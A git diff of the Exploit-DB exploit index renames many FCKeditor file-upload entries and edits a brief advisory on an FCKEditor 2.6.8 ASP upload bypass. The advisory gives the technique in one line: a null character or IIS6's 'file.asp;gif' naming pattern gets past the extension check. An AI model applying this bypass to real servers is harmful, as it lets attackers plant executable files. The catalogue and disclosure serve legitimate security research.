11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0

Can't render this file because it is too large.

View file

@ -1,15 +1,25 @@
- Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass
- Credit goes to: Mostafa Azizi, Soroush Dalili
- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/
- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/
- Description:
There is no validation on the extensions when FCKEditor 2.6.8 ASP version is
dealing with the duplicate files. As a result, it is possible to bypass
the protection and upload a file with any extension.
- Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
- Solution: Please check the provided reference or the vendor website.
- PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
Duplicate files do not have proper validation on their extensions.
As a result, it is possible to upload any file with any extension on the server by using Null Character.
Applications on IIS6 can also use "file.asp;gif" pattern.
